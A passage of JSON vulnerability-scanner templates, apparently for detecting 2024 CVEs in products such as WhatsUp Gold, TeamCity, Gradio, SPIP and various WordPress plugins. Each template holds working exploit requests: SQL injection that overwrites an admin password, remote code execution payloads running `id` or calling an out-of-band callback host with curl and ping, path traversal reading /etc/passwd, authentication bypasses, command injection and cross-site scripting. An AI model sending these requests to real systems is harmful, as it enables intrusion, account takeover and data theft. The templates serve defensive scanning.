charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\nid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2024-6670","info":{"name":"WhatsUp Gold HasErrors SQL Injection - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"KeyStorePassword\": \"{{password}}\", \"TrustStorePassword\": \"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains(set_cookie, 'ASP.NET_SessionId=')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, 'application/json')"],"condition":"and","internal":true}]},{"raw":["GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'DisplayName')"],"condition":"and","internal":true}],"extractors":[{"type":"regex","internal":true,"name":"encryptedPassword","regex":["\"psyduck\\d+(,\\d+)*\""]}]},{"raw":["POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"deviceId\": \"22222\", \"classId\": \"DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--\", \"range\": \"1\", \"n\": \"1\", \"start\": \"3\", \"end\": \"4\", \"businesdsHoursId\": \"5\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'false')"],"condition":"and","internal":true}]},{"raw":["POST /NmConsole/User/LoginAjax HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&rememberMe=false\n"],"matchers":[{"type":"word","part":"body","words":["\"authenticated\":true","\"username\":\""],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-8698","info":{"name":"Keycloak - SAML Core Package Signature Validation Flaw","severity":"high"},"requests":[{"raw":["POST /realms/master/broker/saml/endpoint HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: AUTH_SESSION_ID_LEGACY={{AUTH_SESSION_ID_LEGACY}}\n\nRelayState={{RELAYSTATE}}&SAMLResponse={{urlencode(base64(code_response))}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 302","contains_all(header,\"KEYCLOAK_IDENTITY\",\"KEYCLOAK_SESSION\")"],"condition":"and"}]}]},{"id":"CVE-2024-0939","info":{"name":"Smart S210 Management Platform - Arbitary File Upload","severity":"critical"},"requests":[{"raw":["POST /Tool/uploadfile.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarywnsogfin\nAccept-Encoding: gzip, deflate, br\n\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"contents.php\"\nContent-Type: application/octet-stream\n\n<?php print({{num1}}*{{num2}}); ?>\n------WebKitFormBoundarywnsogfin\nContent-Disposition: form-data; name=\"txt_path\"\n\n/home/{{filename}}.php\n------WebKitFormBoundarywnsogfin--\n","GET /home/{{filename}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31848","info":{"name":"CData API Server < 23.4.8844 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - API Server</title>"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32709","info":{"name":"WP-Recall <= 16.26.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5({{num}}),0x7c,%20%22Version:%22,version()),13--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-9796","info":{"name":"WordPress WP-Advanced-Search <= 3.3.9 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20--&f=user_login&type=&e"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Table '([a-zA-Z0-9_]+)\\.wp_users' doesn't exist"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"database_name","regex":["([a-zA-Z0-9_]+)\\.wp_users"]}]}]},{"id":"CVE-2024-7786","info":{"name":"Sensei LMS < 4.24.2 - Email Template Leak","severity":"high"},"requests":[{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"id\",\"date_gmt\",\"slug\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"template_id","json":[".[0].id"],"internal":true}]},{"raw":["GET /index.php/wp-json/wp/v2/sensei_email/{{template_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sensei_email_preview_id={{template_id}}","media?parent={{template_id}}"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-30269","info":{"name":"DataEase <= 2.4.1 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/de2api/engine/getEngine;.js"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"username\", \"password\", \"port\", \"name\\\":\", \"pid\\\":\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-47062","info":{"name":"Navidrome < 0.53.0 - Authenticated SQL Injection","severity":"critical"},"requests":[{"raw":["POST /auth/login HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n"],"extractors":[{"type":"json","name":"auth_token","internal":true,"part":"body","json":[".token"]}]},{"raw":["GET /api/album?_end=36&_order=DESC&_sort=recently_added&_start=0&1+like+1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,(select+group_concat(concat(user_name,':',password))from+user),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--=123 HTTP/1.1\nHost: {{Hostname}}\nx-nd-authorization: Bearer {{auth_token}}\n"],"extractors":[{"type":"regex","group":1,"part":"body","regex":["sql/driver: couldn't convert \\\\\\\"(.*?)\\\\\\\""]}]}]},{"id":"CVE-2024-23917","info":{"name":"JetBrains TeamCity > 2023.11.3 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,\"<token name=\\\"{{randstr}}\\\"\")"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","name":"authtoken","internal":true,"group":1,"regex":["value=\"(.+)\""]}]},{"method":"GET","path":["{{BaseURL}}/app/rest/server"],"headers":{"Authorization":"Bearer {{authtoken}}"},"extractors":[{"type":"dsl","dsl":["\"Token:\" + authtoken"]}],"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,'<projects href=')"],"condition":"and"}]}]},{"id":"CVE-2024-27198","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax?jsp=/app/rest/server;.jsp"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"buildNumber\", \"server version\", \"internalId\")"],"condition":"and"}]}]},{"id":"CVE-2024-6846","info":{"name":"SmartSearchWP <= 2.4.4 - Unauthenticated Log Purge","severity":"medium"},"requests":[{"raw":["POST /wp-json/wdgpt/v1/purge-error-logs HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"months\":\"1\"}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"success\",\"true\", \"purged successfully\")","contains(content_type,\"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-8021","info":{"name":"Gradio - Open Redirect","severity":"medium"},"requests":[{"raw":["GET /file=http%3A%2F%2Foast.pro/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"},{"type":"status","status":[302]}]}]},{"id":"CVE-2024-8517","info":{"name":"SPIP BigUp Plugin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["formulaire_action_args","spip"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","group":1,"name":"formulaire","regex":["name=['\"]formulaire_action_args['\"]\\s*type=['\"]hidden['\"]\\s*value=['\"]([^'\"]+)['\"]"],"internal":true}]},{"raw":["POST /spip.ph%70?pag%65=spip_pass&lang=fr HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=5f02b65945d644d6a32847ab130e9586\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"page\"\n\nspip_pass\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"lang\"\n\nfr\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action\"\n\noubli\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_args\"\n\n{{formulaire}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"formulaire_action_sign\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"oubli\"\n\n{{email}}\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"nobot\"\n\n\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"bigup_retrouver_fichiers\"\n\na\n--5f02b65945d644d6a32847ab130e9586\nContent-Disposition: form-data; name=\"RCE['.system('id').die().']\"; filename=\"{{filename}}.txt\"\nContent-Type: text/plain\n\n{{string}}\n--5f02b65945d644d6a32847ab130e9586--\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=[0-9]+.*gid=[0-9]+.*"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-46627","info":{"name":"DATAGERRY - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/users/1/settings/"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"response_type\":","\"model\":","\"time\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2024-32737","info":{"name":"CyberPower - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":\"finished\"","\"success\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"modifiedtime\":\"([0-9.]+)\""]}]}]},{"id":"CVE-2024-31750","info":{"name":"F-logic DataCube3 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/pr_monitor/getting_index_data.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nreq_id=1) UNION ALL SELECT CHAR(113,120,107,107,113)||CHAR(117,78,85,110,71,119,86,122,111,101,81,87,68,72,80,107,90,112,111,110,120,72,78,70,76,99,100,81,80,77,89,75,86,65,105,99,74,67,122,107)||CHAR(113,106,120,122,113),NULL,NULL-- sTqG\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"qxkkquNUnGwVzoeQWDHPkZponxHNFLcdQPMYKVAicJCzkqjxzq\")","contains(header, \"application/json\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-9061","info":{"name":"WP Popup Builder Popup Forms and Marketing Lead Generation <= 1.3.5 - Arbitrary Shortcode Execution","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/wp-popup-builder\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=shortcode_Api_Add&shortcode=%43%56%45%2d%32%30%32%34%2d%39%30%36%31\n"],"matchers":[{"type":"dsl","dsl":["len(body) == 13","contains(body, \"CVE-2024-9061\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4836","info":{"name":"Edito CMS - Sensitive Data Leak","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains_any(body,\"content=\\\"edito\", \"www.edito.pl\")","status_code==200"],"condition":"and","internal":true}]},{"method":"GET","path":["{{BaseURL}}/config.php","{{BaseURL}}/config/config.php","{{BaseURL}}/include/config.php","{{BaseURL}}/includes/config.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"db_password\", \"db_username\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-22476","info":{"name":"Intel Neural Compressor <2.5.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /task/submit/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"script_url\": \"https://github.com/huggingface/transformers/blob/v4.21-release/examples/pytorch/text-classification/run_glue.py\",\"optimized\": \"False\",\"arguments\": [\"--model_name_or_path bert-base-cased --task_name mrpc --do_eval --output_dir result\"],\"approach\": \"static\",\"requirements\": [],\"workers\": 1}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["status\":\"successfully","Task submitted successfully"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32735","info":{"name":"CyberPower - Missing Authentication","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/devices"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"account\":","\"passwd\":","status\":\"success"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7029","info":{"name":"AVTECH IP Camera - Command Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supervisor/Factory.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=white_led&brightness=$(echo%20{{string}}+2>&1)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{string}}"]},{"type":"word","negative":true,"part":"body","words":["echo%20{{string}}","echo {{string}}"]},{"type":"word","part":"content_type","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-38472","info":{"name":"Apache HTTPd Windows UNC - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C%5C{{interactsh-url}}/apachehttpd"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"interactsh_request","words":["/apachehttpd"]}]}]},{"id":"CVE-2024-7120","info":{"name":"Raisecom MSG1200, MSG2100E, MSG2200 and MSG2300 3.90 - Command Injection","severity":"medium"},"requests":[{"raw":["GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%27{{randstr}}%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60  HTTP/1.1\nHost: {{Hostname}}\n","GET /tmp/info.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-25600","info":{"name":"Unauthenticated Remote Code Execution \u2013 Bricks <= 1.9.6","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-json/bricks/v1/render_element HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"postId\": \"1\",\n  \"nonce\": \"{{nonce}}\",\n  \"element\": {\n    \"name\": \"container\",\n    \"settings\": {\n      \"hasLoop\": \"true\",\n      \"query\": {\n        \"useQueryEditor\": true,\n        \"queryEditor\": \"ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);\",\n        \"objectType\": \"post\"\n      }\n    }\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true}]}]},{"id":"CVE-2024-32739","info":{"name":"CyberPower < v2.8.3 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[":\"finished\"","\"results\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"code\":\"([0-9.]+)\""]}]}]},{"id":"CVE-2024-39907","info":{"name":"1Panel SQL Injection - Authenticated","severity":"critical"},"requests":[{"raw":["POST /api/v1/auth/login HTTP/1.1\nHost: {{Hostname}}\nEntranceCode: ZW50cmFuY2U=\nContent-Type: application/json\n\n{\"name\":\"{{username}}\",\"password\":\"{{password}}\",\"ignoreCaptcha\":true,\"authMethod\":\"session\",\"language\":\"en\"}\n","POST /api/v1/hosts/command/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"page\":1,\"pageSize\":10,\"groupID\":0,\"orderBy\":\"3;ATTACH DATABASE '/tmp/{{randstr}}.txt' AS test;create TABLE test.exp (data text);create TABLE test.exp (data text);drop table test.exp;\",\"order\":\"ascending\",\"name\":\"a\"}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains_all(body_2, \"SQL logic error\",\"table exp already exists\")","contains(header_1, 'psession')"],"condition":"and"}]}]},{"id":"CVE-2024-5910","info":{"name":"Palo Alto Expedition - Admin Account Takeover","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/OS/startup/restore/restoreAdmin.php"],"matchers-condition":"and","matchers":[{"type":"word","words":["Admin user found","Admin password restored"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6159","info":{"name":"Push Notification for Post and BuddyPress <= 1.93 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/push-notification-for-post-and-buddypress\")"],"internal":true}]},{"raw":["@timeout 50s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=icpushcallback&onesignal_externalid=1+AND+SLEEP(6)&pushtype=onesignal_subscribed_users\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-27956","info":{"name":"WordPress Automatic Plugin <= 3.92.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nq=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","status_code == 200","contains(header, \"application/csv\")","contains_all(body, \"DATE\", \"ACTION\", \"KEYWORD\")"],"condition":"and"}]}]},{"id":"CVE-2024-46986","info":{"name":"Camaleon CMS < 2.8.1 Arbitrary File Write to RCE","severity":"critical"},"requests":[{"raw":["GET /admin/login HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","part":"body","internal":true,"name":"nonce","group":1,"regex":["name=\"authenticity_token\" value=\"(.*?)\""]}]},{"raw":["POST /admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nConnection: keep-alive\n\nauthenticity_token={{nonce}}&user%5Busername%5D={{username}}&user%5Bpassword%5D={{password}}\n"],"matchers":[{"type":"dsl","dsl":["contains(location,\"/admin/dashboard\")"],"internal":true}]},{"raw":["POST /admin/media/upload?actions=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8\n\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"{{filename}}.rb\"\nContent-Type: text/x-ruby-script\n\n`curl {{interactsh-url}}`\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"folder\"\n\n../../../config/initializers/\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"skip_auto_crop\"\n\ntrue\n------WebKitFormBoundarynJs8ffRP2MgQXiF8--\n"],"matchers":[{"type":"word","part":"body","words":["{\"name\":\"{{filename}}.rb\",\"folder_path\":\"../../../config/initializers\""],"internal":true}]},{"raw":["POST /admin/media/upload?actions=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data;boundary=----WebKitFormBoundarynJs8ffRP2MgQXiF8\n\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"restart.txt\"\nContent-Type: text/x-ruby-script\n\n{{randstr}}\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"folder\"\n\n../../../tmp/\n------WebKitFormBoundarynJs8ffRP2MgQXiF8\nContent-Disposition: form-data; name=\"skip_auto_crop\"\n\ntrue\n------WebKitFormBoundarynJs8ffRP2MgQXiF8--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"name\":\"restart.txt\",\"folder_path\":\"../../../tmp\""]}]}]},{"id":"CVE-2024-1728","info":{"name":"Gradio > 4.19.1 UploadButton - Path Traversal","severity":"high"},"requests":[{"raw":["POST /queue/join HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"data\":[{\"path\":\"{{path}}\",\"url\":\"{{BaseURL}}/file=/help\",\"orig_name\":\"CHANGELOG.md\",\"size\":3549,\"mime_type\":\"text/markdown\"}],\"event_data\":null,\"fn_index\":0,\"trigger_id\":2,\"session_hash\":\"{{randstr}}\"}\n","GET /queue/data?session_hash={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /file={{extracted_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"extracted_path","regex":["/tmp/gradio/[^/]+/passwd","C:.*\\win\\.ini"],"internal":true}],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[^:]:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6517","info":{"name":"Contact Form 7 Math Captcha <= 2.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"/wp-content/plugins/ds-cf7-math-captcha\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=dscf7_refreshcaptcha&tagname=\"<script>alert(document.domain)</script>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>"]},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4348","info":{"name":"osCommerce v4.0 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1","{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<ScRiPt>alert('document_domain')</ScRiPt>","Listing of all products on the site"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-5315","info":{"name":"Dolibarr ERP CMS `list.php` - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /htdocs/index.php?mainmenu=home HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginfunction=loginfunction&username={{username}}&password={{password}}\n","GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header_1","words":["Set-Cookie: DOLSESSID_"]},{"type":"word","part":"body_1","words":["SuperAdmin"]}]}]},{"id":"CVE-2024-36527","info":{"name":"Puppeteer Renderer  - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33610","info":{"name":"Sharp Multifunction Printers - Cookie Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sessionlist.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["No.","User","From","Last login","Last access","Language ID","Cookie"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-28987","info":{"name":"SolarWinds Web Help Desk - Hardcoded Credential","severity":"critical"},"requests":[{"raw":["GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username+':'+password)}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["displayClient","shortDetail"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-33605","info":{"name":"Sharp Multifunction Printers - Directory Listing","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/installed_emanual_list.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ServiceEmanualList","/installed_emanual_down.html"],"condition":"and"},{"type":"word","part":"header","words":["Set-Cookie: MFPSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31621","info":{"name":"Flowise 1.6.5 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/API/V1/credentials"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"credentialName\":","\"updatedDate\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7354","info":{"name":"Ninja Forms 3.8.6-3.8.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["/wp-content/plugins/ninja-forms"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-submissions&\"><script>alert(document.domain)</script>=2 HTTP/1.1\nHost: 